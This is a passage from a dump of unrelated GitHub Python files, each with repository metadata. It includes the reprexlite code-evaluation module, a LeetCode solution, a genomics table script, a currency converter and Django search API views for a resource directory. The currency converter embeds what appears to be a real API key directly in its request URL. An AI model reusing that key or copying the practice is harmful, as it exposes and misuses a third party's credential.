StringIO\nfrom itertools import chain\nimport os\nfrom pathlib import Path\nfrom pprint import pformat\nimport traceback\nfrom typing import Any, Dict, List, Optional, Sequence, Tuple, Union\n\ntry:\n from typing import Self # type: ignore # Python 3.11+\nexcept ImportError:\n from typing_extensions import Self\n\nimport libcst as cst\n\nfrom reprexlite.config import ParsingMethod, ReprexConfig\nfrom reprexlite.exceptions import BlackNotFoundError, InputSyntaxError, UnexpectedError\nfrom reprexlite.formatting import formatter_registry\nfrom reprexlite.parsing import LineType, auto_parse, parse\n\n\n@dataclasses.dataclass\nclass RawResult:\n \"\"\"Class that holds the result of evaluated code. 
Use `str(...)` on an instance to produce a\n pretty-formatted comment block representation of the result.\n\n Attributes:\n config (ReprexConfig): Configuration for formatting and parsing\n raw (Any): Some Python object that is the raw return value of evaluated Python code.\n stdout (str): Standard output from evaluated Python code.\n \"\"\"\n\n config: ReprexConfig\n raw: Any\n stdout: Optional[str]\n\n def __str__(self) -> str:\n if not self:\n raise UnexpectedError(\"Should not print a RawResult if it tests False.\")\n lines = []\n if self.stdout:\n lines.extend(self.stdout.split(\"\\n\"))\n if self.raw is not None:\n lines.extend(pformat(self.raw, indent=2, width=77).split(\"\\n\"))\n if self.config.comment:\n return \"\\n\".join(self.config.comment + \" \" + line for line in lines)\n else:\n return \"\\n\".join(lines)\n\n def __bool__(self) -> bool:\n \"\"\"Tests whether instance contains anything to print.\"\"\"\n return not (self.raw is None and self.stdout is None)\n\n def __repr__(self) -> str:\n return (\n f\"\"\n )\n\n def __eq__(self, other: Any) -> bool:\n if isinstance(other, RawResult):\n return self.raw == other.raw and self.stdout == other.stdout\n else:\n return NotImplemented\n\n\n@dataclasses.dataclass\nclass ParsedResult:\n \"\"\"Class that holds parsed result from reading a reprex.\n\n Attributes:\n config (ReprexConfig): Configuration for formatting and parsing\n lines (List[str]): String content of result parsed from a reprex\n \"\"\"\n\n config: ReprexConfig\n lines: List[str]\n\n def __str__(self) -> str:\n if not self:\n raise UnexpectedError(\"Should not print a ParsedResult if it tests False.\")\n return \"\\n\".join(self.prefix * 2 + line for line in self.lines)\n\n def as_result_str(self) -> str:\n return \"\\n\".join(self.prefix + line for line in self.lines)\n\n @property\n def prefix(self) -> str:\n if self.config.comment:\n return self.config.comment + \" \"\n else:\n return \"\"\n\n def __bool__(self) -> bool:\n \"\"\"Tests whether instance contains anything to print.\"\"\"\n return bool(self.lines)\n\n def __repr__(self) -> str:\n joined = \"\\\\n\".join(self.lines)\n return f\"\"\n\n def __eq__(self, other: Any) -> bool:\n if isinstance(other, ParsedResult):\n return self.lines == other.lines\n elif isinstance(other, RawResult):\n if not bool(self) and not bool(other):\n return True\n return bool(self) and bool(other) and self.as_result_str() == str(other)\n else:\n return NotImplemented\n\n\n@dataclasses.dataclass\nclass Statement:\n \"\"\"Dataclass that holds a LibCST parsed statement. 
of code.\n\n Attributes:\n config (ReprexConfig): Configuration for formatting and parsing\n stmt (Union[libcst.SimpleStatementLine, libcst.BaseCompoundStatement]): LibCST parsed\n statement.\n \"\"\"\n\n config: ReprexConfig\n stmt: Union[cst.SimpleStatementLine, cst.BaseCompoundStatement, cst.EmptyLine]\n\n def evaluate(self, scope: dict) -> RawResult:\n \"\"\"Evaluate code statement and produce a RawResult dataclass instance.\n\n Args:\n scope (dict): scope to use for evaluation\n\n Returns:\n RawResult: Dataclass instance holding evaluation results.\n \"\"\"\n if isinstance(self.stmt, cst.EmptyLine):\n return RawResult(config=self.config, raw=None, stdout=None)\n\n if \"__name__\" not in scope:\n scope[\"__name__\"] = \"__reprex__\"\n stdout_io = StringIO()\n try:\n with redirect_stdout(stdout_io):\n try:\n # Treat as a single expression\n result = eval(self.code.strip(), scope)\n except SyntaxError:\n # Treat as a statement\n exec(self.code.strip(), scope)\n result = None\n stdout = stdout_io.getvalue().strip()\n except Exception as exc:\n result = None\n # Skip first step of traceback, since that is this evaluate method\n if exc.__traceback__ is not None:\n tb = exc.__traceback__.tb_next\n stdout = (\n \"Traceback (most recent call last):\\n\"\n + \"\".join(line for line in traceback.format_tb(tb))\n + f\"{type(exc).__name__}: {exc}\"\n )\n finally:\n stdout_io.close()\n\n return RawResult(config=self.config, raw=result, stdout=stdout or None)\n\n @property\n def raw_code(self) -> str:\n \"\"\"Raw code of contained statement as a string.\"\"\"\n if isinstance(self.stmt, cst.EmptyLine):\n return cst.Module(body=[], header=[self.stmt]).code.rstrip()\n return cst.Module(body=[self.stmt]).code.rstrip()\n\n @property\n def code(self) -> str:\n \"\"\"Code of contained statement. May be autoformatted depending on configuration.\"\"\"\n code = self.raw_code\n if self.config.style:\n try:\n from black import Mode, format_str\n except ModuleNotFoundError as e:\n if e.name == \"black\":\n raise BlackNotFoundError(\"Must install black to restyle code.\", name=\"black\")\n else:\n raise\n\n code = format_str(code, mode=Mode())\n return code\n\n def __str__(self) -> str:\n out = self.code\n if self.config.prompt:\n # Add prompt and continuation prefixes to lines\n lines = out.split(\"\\n\")\n primary_found = False\n out = \"\"\n for line in lines:\n if line.strip() == \"\":\n # Whitespace line\n out += f\"{self.config.prompt} \" + line + \"\\n\"\n elif line.startswith(\"#\"):\n # Comment line\n out += f\"{self.config.prompt} \" + line + \"\\n\"\n else:\n # Code line\n if not primary_found:\n out += f\"{self.config.prompt} \" + line + \"\\n\"\n primary_found = True\n else:\n out += f\"{self.config.continuation} \" + line + \"\\n\"\n return out.rstrip()\n\n def __bool__(self) -> bool:\n \"\"\"Tests whether this instance contains anything to print. 
Always true for Statement.\"\"\"\n return True\n\n def __repr__(self) -> str:\n return f\"<Statement '{to_snippet(self.code, 10)}'>\"\n\n def __eq__(self, other: Any) -> bool:\n if isinstance(other, Statement):\n return self.raw_code == other.raw_code\n return NotImplemented\n\n\n@dataclasses.dataclass\nclass Reprex:\n \"\"\"Dataclass for a reprex, which holds Python code and results from evaluation.\n\n Attributes:\n config (ReprexConfig): Configuration for formatting and parsing\n statements (List[Statement]): List of parsed Python code statements\n results (List[RawResult]): List of results evaluated from statements\n old_results (List[ParsedResult]): List of any old results parsed from input code\n scope (Dict[str, Any]): Dictionary holding the scope that the reprex was evaluated in\n \"\"\"\n\n config: ReprexConfig\n statements: List[Statement]\n results: List[RawResult]\n old_results: List[ParsedResult]\n scope: Dict[str, Any]\n\n def __post_init__(self) -> None:\n if not (len(self.statements) == len(self.results) == len(self.old_results)):\n raise UnexpectedError(\n \"statements, results, and old_results should all be the same length. \"\n f\"Got: {(len(self.statements), len(self.results), len(self.old_results))}.\"\n )\n\n @classmethod\n def from_input(\n cls,\n input: str,\n config: Optional[ReprexConfig] = None,\n scope: Optional[Dict[str, Any]] = None,\n ) -> Self:\n \"\"\"Create a Reprex instance from parsing and evaluating code from a string.\n\n Args:\n input (str): Input code\n config (Optional[ReprexConfig], optional): Configuration. Defaults to None, which will\n use default settings.\n scope (Optional[Dict[str, Any]], optional): Dictionary holding scope that the parsed\n code will be evaluated with. Defaults to None, which will create an empty\n dictionary.\n\n Returns:\n Reprex: New instance of Reprex.\n \"\"\"\n if config is None:\n config = ReprexConfig()\n if config.parsing_method == ParsingMethod.AUTO:\n lines = list(auto_parse(input))\n elif config.parsing_method == ParsingMethod.DECLARED:\n lines = list(\n parse(\n input,\n prompt=config.resolved_input_prompt,\n continuation=config.resolved_input_continuation,\n comment=config.resolved_input_comment,\n )\n )\n else:\n raise UnexpectedError( # pragma: nocover\n f\"Parsing method {config.parsing_method} is not implemented.\"\n )\n return cls.from_input_lines(lines, config=config, scope=scope)\n\n @classmethod\n def from_input_lines(\n cls,\n lines: Sequence[Tuple[str, LineType]],\n config: Optional[ReprexConfig] = None,\n scope: Optional[Dict[str, Any]] = None,\n ) -> Self:\n \"\"\"Creates a Reprex instance from the output of [parse][reprexlite.parsing.parse].\n\n Args:\n lines (Sequence[Tuple[str, LineType]]): Output from parse.\n config (Optional[ReprexConfig], optional): Configuration. Defaults to None, which will\n use default settings.\n scope (Optional[Dict[str, Any]], optional): Dictionary holding scope that the parsed\n code will be evaluated with. 
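The Reprex dataclass above keeps three parallel lists in lockstep and guards that invariant in __post_init__. A stripped-down sketch of the same pattern (Paired is a hypothetical name):

    import dataclasses
    from typing import List

    @dataclasses.dataclass
    class Paired:
        statements: List[str]
        results: List[str]

        def __post_init__(self) -> None:
            # Same invariant style as Reprex.__post_init__: parallel lists
            # must be the same length or construction fails fast.
            if len(self.statements) != len(self.results):
                raise ValueError(
                    f"length mismatch: {len(self.statements)} != {len(self.results)}"
                )

    Paired(["x = 1"], ["#> 1"])  # ok; Paired(["x = 1"], []) raises ValueError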
Defaults to None, which will create an empty\n dictionary.\n\n Returns:\n Reprex: New instance of Reprex.\n \"\"\"\n if config is None:\n config = ReprexConfig()\n statements: List[Statement] = []\n old_results: List[ParsedResult] = []\n current_code_block: List[str] = []\n current_result_block: List[str] = []\n try:\n for line_content, line_type in lines:\n if line_type is LineType.CODE:\n # Flush results\n if current_result_block:\n old_results += [ParsedResult(config=config, lines=current_result_block)]\n current_result_block = []\n # Append line to current code\n current_code_block.append(line_content)\n elif line_type is LineType.RESULT:\n # Flush code\n if current_code_block:\n # Parse code and create Statements\n tree: cst.Module = cst.parse_module(\"\\n\".join(current_code_block))\n new_statements = (\n [Statement(config=config, stmt=stmt) for stmt in tree.header]\n + [Statement(config=config, stmt=stmt) for stmt in tree.body]\n + [Statement(config=config, stmt=stmt) for stmt in tree.footer]\n )\n statements += new_statements\n # Pad results with empty results, 1 fewer because of current_result_block\n old_results += [ParsedResult(config=config, lines=[])] * (\n len(new_statements) - 1\n )\n # Reset current code block\n current_code_block = []\n # Append line to current results\n current_result_block.append(line_content)\n # Flush code\n if current_code_block:\n if all(not line for line in current_code_block):\n # Case where all lines are whitespace: strip and don't add\n new_statements = []\n else:\n # Parse code and create Statements\n tree: cst.Module = cst.parse_module( # type: ignore[no-redef]\n \"\\n\".join(current_code_block)\n )\n new_statements = (\n [Statement(config=config, stmt=stmt) for stmt in tree.header]\n + [Statement(config=config, stmt=stmt) for stmt in tree.body]\n + [Statement(config=config, stmt=stmt) for stmt in tree.footer]\n )\n # Pad results with empty results, 1 fewer because of current_result_block\n statements += new_statements\n old_results += [ParsedResult(config=config, lines=[])] * (len(new_statements) - 1)\n # Flush results\n if current_result_block:\n old_results += [ParsedResult(config=config, lines=current_result_block)]\n # Pad results to equal length\n old_results += [ParsedResult(config=config, lines=[])] * (\n len(statements) - len(old_results)\n )\n\n # Evaluate for new results\n if scope is None:\n scope = {}\n results = [statement.evaluate(scope=scope) for statement in statements]\n return cls(\n config=config,\n statements=statements,\n results=results,\n old_results=old_results,\n scope=scope,\n )\n except cst.ParserSyntaxError as e:\n raise InputSyntaxError(str(e)) from e\n\n def __eq__(self, other: Any) -> bool:\n if isinstance(other, Reprex):\n return (\n self.config == other.config\n and all(left == right for left, right in zip(self.statements, other.statements))\n and all(left == right for left, right in zip(self.results, other.results))\n and all(left == right for left, right in zip(self.old_results, other.old_results))\n )\n else:\n return NotImplemented\n\n def __str__(self) -> str:\n if self.config.keep_old_results:\n lines = chain.from_iterable(zip(self.statements, self.old_results, self.results))\n else:\n lines = chain.from_iterable(zip(self.statements, self.results))\n out = \"\\n\".join(str(line) for line in lines if line)\n if not out.endswith(\"\\n\"):\n out += \"\\n\"\n return out\n\n @property\n def results_match(self) -> bool:\n \"\"\"Whether results of evaluating code match old results parsed from input.\"\"\"\n 
return all(\n result == old_result for result, old_result in zip(self.results, self.old_results)\n )\n\n def format(self, terminal: bool = False) -> str:\n out = str(self)\n if terminal:\n try:\n from pygments import highlight\n from pygments.formatters import Terminal256Formatter\n from pygments.lexers import PythonLexer\n\n out = highlight(out, PythonLexer(), Terminal256Formatter(style=\"friendly\"))\n except ModuleNotFoundError:\n pass\n formatter = formatter_registry[self.config.venue]\n return formatter.format(\n out.strip(), advertise=self.config.advertise, session_info=self.config.session_info\n )\n\n def __repr__(self) -> str:\n return f\"<Reprex '{to_snippet(str(self), 10)}'>\"\n\n def _repr_html_(self) -> str:\n \"\"\"HTML representation. Used for rendering in Jupyter.\"\"\"\n out = []\n try:\n from pygments import highlight\n from pygments.formatters import HtmlFormatter\n from pygments.lexers import PythonLexer\n\n formatter = HtmlFormatter(style=\"friendly\", wrapcode=True)\n out.append(f\"<style>{formatter.get_style_defs('.highlight')}</style>\")\n out.append(highlight(self.format(), PythonLexer(), formatter))\n except ModuleNotFoundError:\n out.append(f\"<pre><code>{self.format()}</code></pre>\")\n return \"\\n\".join(out)\n\n\ndef to_snippet(s: str, n: int) -> str:\n if len(s) <= n:\n return rf\"{s}\"\n else:\n return rf\"{s[:n]}...\"\n\n\ndef reprex(\n input: str,\n outfile: Optional[Union[str, os.PathLike]] = None,\n print_: bool = True,\n terminal: bool = False,\n config: Optional[ReprexConfig] = None,\n **kwargs,\n) -> Reprex:\n \"\"\"A convenient functional interface to render reproducible examples of Python code for\n sharing. This function will evaluate your code and, by default, print out your code with the\n evaluated results embedded as comments, formatted with additional markup appropriate to the\n sharing venue set by the `venue` keyword argument. The function returns an instance of\n [`Reprex`][reprexlite.reprexes.Reprex] which holds the relevant data.\n\n For example, for the `gh` venue for GitHub Flavored Markdown, you'll get a reprex whose\n formatted output looks like:\n\n ````\n ```python\n x = 2\n x + 2\n #> 4\n ```\n\n Created at 2021-02-15 16:58:47 PST by [reprexlite](https://github.com/jayqi/reprexlite)\n ````\n\n\n Args:\n input (str): Input code to create a reprex for.\n outfile (Optional[str | os.PathLike]): If provided, path to write formatted reprex\n output to. Defaults to None, which does not write to any file.\n print_ (bool): Whether to print formatted reprex output to console.\n terminal (bool): Whether currently in a terminal. If true, will automatically apply code\n highlighting if pygments is installed.\n config (Optional[ReprexConfig]): Instance of the configuration dataclass. Default of None\n will instantiate one with default values.\n **kwargs: Configuration options from [ReprexConfig][reprexlite.config.ReprexConfig]. Any\n provided values will override values from provided config or the defaults.\n\n Returns:\n (Reprex) Reprex instance\n \"\"\" # noqa: E501\n\n if config is None:\n config = ReprexConfig(**kwargs)\n else:\n config = dataclasses.replace(config, **kwargs)\n\n if config.venue in [\"html\", \"rtf\"]:\n # Don't screw up output file or lexing for HTML and RTF with terminal syntax highlighting\n terminal = False\n r = Reprex.from_input(input, config=config)\n output = r.format(terminal=terminal)\n if outfile is not None:\n with Path(outfile).open(\"w\") as fp:\n fp.write(r.format(terminal=False))\n if print_:\n print(output)\n return r\n","repo_name":"jayqi/reprexlite","sub_path":"reprexlite/reprexes.py","file_name":"reprexes.py","file_ext":"py","file_size_in_byte":19891,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"}
+{"seq_id":"71888471209","text":"# leetcode 931. 
Minimum Falling Path Sum\n\nclass Solution:\n def minFallingPathSum(self, matrix: List[List[int]]) -> int:\n n = len(matrix)\n dp = [[int(1e9)]*n for _ in range(n)]\n \n for i in range(n) :\n dp[0][i] = matrix[0][i]\n \n for i in range(1,n) :\n for j in range(n) :\n if j-1 >= 0 :\n dp[i][j-1] = min(dp[i][j-1],dp[i-1][j]+matrix[i][j-1])\n if j+1 < n :\n dp[i][j+1] = min(dp[i][j+1],dp[i-1][j]+matrix[i][j+1])\n dp[i][j] = min(dp[i][j],dp[i-1][j]+matrix[i][j]) \n\n\n return min(dp[n-1])","repo_name":"do0134/solostudy","sub_path":"algorithm/2022/12월/1214/1213-1sol.py","file_name":"1213-1sol.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"69926021290","text":"def mutectPreAnnovar(genome_infile, mt_infile, pair, outfile):\n\n import pandas as pd\n\n # set some needed data types\n dtype = {'contig': 'str',\n 'position': 'str',\n 'n_ref_count': 'int',\n 't_ref_count': 'int'}\n\n # load MUTECT tables\n genome = pd.read_table(genome_infile, sep='\\t', header=1, dtype=dtype)\n mt = pd.read_table(mt_infile, sep='\\t', header=1, dtype=dtype)\n\n # remove 'MT' variants called by 'genomic branch' of the pipeline\n genome = genome.loc[genome.contig != 'MT',]\n\n # merge\n mutect = pd.concat([genome, mt])\n\n # re-organize first columns to fit ANNOVAR\n # remove tumor and normal names columns\n mutect = pd.concat([pd.DataFrame({'chrom': mutect.contig}),\n pd.DataFrame({'start': mutect.position}),\n pd.DataFrame({'end': mutect.position}),\n pd.DataFrame({'ref': mutect.ref_allele}),\n pd.DataFrame({'alt': mutect.alt_allele}),\n mutect.context,\n mutect.iloc[:,7:]\n ], axis=1)\n\n # compute N and T depth\n mutect['n_depth'] = mutect.n_ref_count + mutect.n_alt_count\n mutect['t_depth'] = mutect.t_ref_count + mutect.t_alt_count\n\n # compute N and T VAF\n mutect['n_vaf'] = mutect.n_alt_count / mutect.n_depth\n mutect['t_vaf'] = mutect.t_alt_count / mutect.t_depth\n\n # create 'variant' column\n mutect['variant'] = ['_'.join(row[:5].tolist() + [pair]) for i, row in mutect.iterrows()]\n\n # write to file\n mutect.to_csv(outfile, sep='\\t', index=False)\n\nmutectPreAnnovar(snakemake.input['genome_infile'],\n snakemake.input['mt_infile'],\n snakemake.params['pair'],\n snakemake.output['outfile'])\n","repo_name":"UniboDIFABiophysics/WESPipeline","sub_path":"scripts/mutectPreAnnovar.py","file_name":"mutectPreAnnovar.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37351245872","text":"def Binarytodecimal(n):\n num=n;\n dvalue=0;\n\n base=1 \n temp=num;\n while(temp):\n last_digit=temp%10\n temp=int(temp/10)\n dvalue+=last_digit*base\n base*=2\n return dvalue\n\na=Binarytodecimal(101)\nprint(a)","repo_name":"AmitChapde/Practice","sub_path":"BinarytoDecimal.py","file_name":"BinarytoDecimal.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"uk","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38669326935","text":"import requests\nimport json\nfrom config import keys\n\nclass APIException(Exception):\n pass\n\nclass Converter:\n @staticmethod\n def get_price(quote: str, base: str, amount: str):\n if quote == base:\n raise APIException(f\"Невозможно осуществить конвертацию валюты одного и то же наименования {base}.\")\n try:\n quote_ticker = keys[quote]\n except KeyError:\n raise APIException(f'Не удалось обработать валюту {quote}')\n try:\n base_ticker = 
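The LeetCode 931 record above pushes costs downward into dp[i][j-1], dp[i][j], dp[i][j+1]. An equivalent pull-based rewrite with O(n) memory, assuming the same problem statement (min_falling_path_sum is an illustrative name):

    def min_falling_path_sum(matrix):
        # Each cell takes the cheapest of the three parents in the row above.
        n = len(matrix)
        prev = list(matrix[0])
        for i in range(1, n):
            cur = []
            for j in range(n):
                best = prev[j]
                if j > 0:
                    best = min(best, prev[j - 1])
                if j < n - 1:
                    best = min(best, prev[j + 1])
                cur.append(best + matrix[i][j])
            prev = cur
        return min(prev)

    assert min_falling_path_sum([[2, 1, 3], [6, 5, 4], [7, 8, 9]]) == 13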
keys[base]\n except KeyError:\n raise APIException(f\"Не удалось обработать валюту {base}\")\n try:\n amount = str(amount)\n except ValueError:\n raise APIException(f\"Не удалось обработать количество {amount}\")\n\n r = requests.get(f'https://v6.exchangerate-api.com/v6/af4c65dd57ce550e76041503/pair/{quote_ticker}/{base_ticker}')\n total_base = json.loads(r.content)[\"conversion_rate\"] * float(amount)\n return total_base","repo_name":"GefKarter/Report","sub_path":"Cash_Bot/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13885375130","text":"import re\n\nfrom django.conf import settings\nfrom django.core import serializers\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.db.models.query import QuerySet\nfrom django.http import HttpResponse\nfrom django.utils import simplejson as json\n\nfrom mongoengine import ValidationError #, Q\nfrom mongoengine.connection import _get_db as get_db\n\nfrom analytics.shortcuts import (increment_api_queries, increment_api_locations,\n increment_api_resources)\nfrom locations.models import Location\nfrom resources.models import Resource, Curation\nfrom resources.search import find_by_place_or_kwords, get_location\nincrement_api_resources\nclass JsonResponse(HttpResponse):\n \"\"\"from http://www.djangosnippets.org/snippets/1639/\"\"\"\n errors = {}\n __data = []\n callback = None\n\n def __set_data(self, data):\n if data == []:\n self.__data = []\n else:\n self.__data = (isinstance(data, QuerySet) or hasattr(data[0], '_meta'))\\\n and serializers.serialize('python', data) or data\n\n data = property(fset = __set_data)\n\n def __get_container(self):\n content = json.dumps(\n {\n \"data\": self.__data,\n \"errors\":self.errors,\n }, cls = DjangoJSONEncoder)\n if self.callback:\n return '%s (%s)' % (self.callback, content)\n else:\n return content\n\n def __set_container(self, val):\n pass\n\n _container = property(__get_container, __set_container)\n\n def __init__(self, *args, **kwargs):\n kwargs[\"mimetype\"] = \"application/javascript\"\n\n if \"data\" in kwargs:\n self.data = kwargs.pop(\"data\")\n\n if \"errors\" in kwargs:\n self.errors = kwargs.pop(\"errors\")\n\n if \"callback\" in kwargs:\n self.callback = kwargs.pop('callback')\n\n super(JsonResponse, self).__init__(*args, **kwargs)\n\ndef resource_by_id(request, id):\n \"\"\"docstring for item_resource\"\"\"\n callback = request.REQUEST.get('callback')\n\n errors = []\n try:\n item = Resource.objects.get(id=id)\n except ValidationError:\n result_code = 20\n errors.append('Not a valid resource ID')\n except Resource.DoesNotExist:\n result_code = 20\n errors.append('No resource found with that ID')\n # print item.title\n\n if errors:\n return JsonResponse(errors={ 'code': result_code, 'message': '. 
'.join(errors)})\n\n increment_api_resources(id)\n\n data=[{\n 'id': unicode(item.id),\n 'title': item.title,\n 'description': item.description,\n 'resourcetype': item.resource_type or '',\n 'uri': item.uri,\n 'locations': ['%s, %s' % (loc.lat_lon[0], loc.lat_lon[1]) for loc in item.locations],\n 'locationnames': [loc.place_name for loc in item.locations],\n 'event_start': (item.calendar_event.start or '') if item.calendar_event else '',\n 'event_end': (item.calendar_event.end or '') if item.calendar_event else '',\n 'tags': item.tags,\n 'lastmodified': item.item_metadata.last_modified,\n }]\n return JsonResponse(data=data, callback=callback)\n\ndef _check_int(i):\n try:\n int(i)\n return True\n except ValueError:\n return None\n\ndef _check_api_bool(value, default=False):\n \"\"\" returns a boolean value for value\n False if 0, True if any other int\n returns default if value is None or not an int\n \"\"\"\n try: \n result = int(value)\n except (ValueError, TypeError):\n result = default\n return bool(result)\n\ndef _loc_to_str(loc):\n if loc:\n return [\"%.16f, %.16f\" % (loc[0], loc[1])]\n else:\n return []\n\ndef resource_search(request):\n def _resource_result(r):\n result = {\n 'id': r['res_id'],\n 'title': r['title'],\n 'description': r.get('short_description', ''),\n # 'resource_type': r[''] resource_type or '',\n 'uri': r.get('uri', ''),\n 'locations': r.get('pt_location', []),\n 'locationnames': r.get('loc_labels', []),\n # u'loc_labels': [u'EH17 8QG, Liberton/Gilmerton, of Edinburgh'], u'pt_location': [u'55.9062925785, -3.13446285433']\n 'tags': r.get('keywords', ''),\n 'accounts': r.get('accounts', ''),\n 'score': r['score']\n # 'last_modified': r[''] .item_metadata.last_modified,\n }\n if r.get('event_start'):\n result['event_start'] = r.get('event_start')\n if r.get('event_end'):\n result['event_end'] = r.get('event_end')\n return result\n\n location = request.REQUEST.get('location', '')\n accounts = request.REQUEST.get('accounts', '')\n collections = request.REQUEST.get('collections', '')\n if collections:\n accounts = ''\n event = request.REQUEST.get('event', None)\n query = request.REQUEST.get('query')\n max = request.REQUEST.get('max', unicode(settings.SOLR_ROWS))\n start = request.REQUEST.get('start', 0)\n output = request.REQUEST.get('output', 'json')\n boost_location = request.REQUEST.get('boostlocation', (settings.SOLR_LOC_BOOST_DEFAULT))\n callback = request.REQUEST.get('callback')\n\n increment_api_queries(query)\n increment_api_locations(location)\n\n result_code = 200\n\n errors = []\n # if not query:\n # result_code = 10\n # errors.append('Param \\'query\\' must be valid search query')\n if not _check_int(max) or int(max) > settings.SOLR_ROWS:\n result_code = 10\n errors.append('Param \\'max\\' must be positive integer maximum value of %s. You sent %s' % (settings.SOLR_ROWS, max))\n if not _check_int(start) or int(start) < 0:\n result_code = 10\n errors.append('Param \\'start\\' must be positive integer. You sent %s' % start)\n if not _check_int(boost_location) or int(boost_location) > int(settings.SOLR_LOC_BOOST_MAX):\n result_code = 10\n errors.append('Param \\'boostlocation\\' must be an integer number between 0 and %s. 
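resource_search above validates each query parameter and accumulates human-readable errors before touching the backend. A self-contained sketch of that accumulate-errors pattern (validate_paging is a hypothetical name; row_cap stands in for settings.SOLR_ROWS):

    def validate_paging(max_, start, row_cap=100):
        # Collect every problem instead of failing on the first one,
        # mirroring the errors list built up in resource_search.
        errors = []
        try:
            max_ = int(max_)
            if not 1 <= max_ <= row_cap:
                errors.append(f"'max' must be 1..{row_cap}, got {max_}")
        except (TypeError, ValueError):
            errors.append(f"'max' must be an integer, got {max_!r}")
        try:
            start = int(start)
            if start < 0:
                errors.append(f"'start' must be >= 0, got {start}")
        except (TypeError, ValueError):
            errors.append(f"'start' must be an integer, got {start!r}")
        return errors

    print(validate_paging("10", "0"))     # []
    print(validate_paging("1000", "-1"))  # two error messages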
You sent %s' % (int(settings.SOLR_LOC_BOOST_MAX), boost_location))\n if event and event != '*':\n result_code = 10\n errors.append('Param \\'event\\' must be * if present.')\n if not errors:\n loc, resources = find_by_place_or_kwords(\n location, \n query, \n boost_location, \n start=start, \n max=int(max), \n accounts=accounts.split(), \n collections=collections.split(), \n event=event)\n if location and not loc:\n result_code = 10\n errors.append('Location \\'%s\\' not found.' % location)\n\n if errors:\n return JsonResponse(errors=[{ 'code': result_code, 'message': '. '.join(errors)}], callback=callback)\n else:\n results = [_resource_result(r) for r in resources]\n data = [ { 'query': query, 'max': max, 'start': start, 'numfound': resources.hits, 'output': output,\n 'location': _loc_to_str(loc['lat_lon']) if loc else '', 'event': event, 'boostlocation': boost_location,\n 'accounts': accounts, 'collections': collections,\n 'results': results } ]\n return JsonResponse(data=data, callback=callback)\n\n\ndef publish_data(request):\n \"\"\"docstring for publish_data\"\"\"\n def _resource_result(r):\n return {\n 'id': unicode(r.id),\n 'title': r.title,\n 'description': r.description,\n 'resource_type': r.resource_type,\n 'uri': 'http://aliss.org/depot/resource/%s/' % unicode(r.id),\n 'source_uri': r.uri,\n 'locations': [{\n 'postcode': l.postcode, \n 'place_name': l.place_name, \n 'loc_type': l.loc_type, \n 'lat_lon': l.lat_lon,\n 'district': l.district,\n 'country_code': l.country_code\n } for l in r.locations],\n # 'event_start': r.event_start,\n 'tags': r.all_tags,\n 'curations': ['http://aliss.org/depot/curation/%s/' % unicode(c.id) for c in r.curations],\n # 'accounts': r.get('accounts', ''),\n # 'score': r['score']\n # # 'last_modified': r[''] .item_metadata.last_modified,\n }\n\n max = request.REQUEST.get('max', unicode(settings.SOLR_ROWS))\n start = request.REQUEST.get('start', 0)\n callback = request.REQUEST.get('callback')\n\n result_code = 200\n\n errors = []\n if not _check_int(max) or int(max) > settings.SOLR_ROWS:\n result_code = 10\n errors.append('Param \\'max\\' must be positive integer maximum value of %s. You sent %s' % (settings.SOLR_ROWS, max))\n if not _check_int(start) or int(start) < 0:\n result_code = 10\n errors.append('Param \\'start\\' must be positive integer. You sent %s' % start)\n if errors:\n return JsonResponse(errors={ 'code': result_code, 'message': '. 
'.join(errors)}, data=[], callback=callback)\n # return JsonResponse(data=[], callback=callback)\n else:\n results = [_resource_result(r) for r in Resource.objects[int(start):int(start)+int(max)]]\n data = [ { 'max': max, 'start': start, 'results': results }]\n return JsonResponse(data=data, callback=callback)\n\ndef tags(request):\n \"\"\"\n API call with optional params for callback and match\n callback: for jsonp callback function name\n match: if present, results will be alpha sorted list of all tags used starting with match\n (case insensitive, so \"men\" might return \"mental health, Mental Health, mentoring\")\n if match is not passed, all tags in use will be returned.\n returns alpha sorted list of strings\n \"\"\"\n errors = []\n data = None\n result_code = 200\n\n # /api/tags/?callback=jsonp1268179474512&match=exe\n\n match = request.REQUEST.get('match')\n callback = request.REQUEST.get('callback')\n\n if not match is None:\n if len(match) > 2:\n results = [t for t in\n Curation.objects.ensure_index(\"tags\").filter(tags__istartswith=match).distinct(\"tags\") \\\n if t.lower().startswith(match.lower())]\n else:\n result_code = 10\n errors.append('Param \\'match\\' must be greater than 2 characters. You sent \\'%s\\'' % match)\n else:\n results = Curation.objects.ensure_index(\"tags\").distinct(\"tags\")\n\n if errors:\n return JsonResponse(errors={ 'code': result_code, 'message': '. '.join(errors)}, data=[], callback=callback)\n\n return JsonResponse(data=sorted(results), callback=callback)\n\ndef tagsforwordle(request):\n \"\"\"\n returns dump of all tags for use in wordle\n todo: wordle accepts ~ to join words\n \"\"\"\n result = []\n for res in Resource.objects:\n result.extend([tag.replace(' ', '~') for tag in res.tags])\n\n return HttpResponse(' '.join(result))\n\ndef locations(request):\n def _location_context(loc):\n return {\n 'id': str(loc['_id']),\n 'place_name': loc['place_name'],\n 'postcode': loc.get('postcode', ''),\n 'district': loc.get('district', '')}\n errors = []\n data = []\n response_code = 200\n\n match = request.REQUEST.get('match')\n callback = request.REQUEST.get('callback')\n # postcodes True unless param exists and is 0\n postcodes = _check_api_bool(request.REQUEST.get('postcodes'), True)\n\n if match and len(match) > 2:\n data = [_location_context(l)\n for l in get_location(match, just_one=False, starts_with=True, postcodes=postcodes)]\n else:\n response_code = 10\n errors.append('Param \\'match\\' must be greater than 2 characters. You sent \\'%s\\'' % match)\n return JsonResponse(\n errors=errors and {'code': response_code, 'message': '. 
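The JsonResponse subclass earlier in this file serializes its payload lazily through the _container property and wraps it in a callback name for JSONP. A stripped-down sketch of that idea without the Django machinery (JsonishResponse is a hypothetical name):

    import json

    class JsonishResponse:
        def __init__(self, data=None, errors=None, callback=None):
            self.data = data or []
            self.errors = errors or {}
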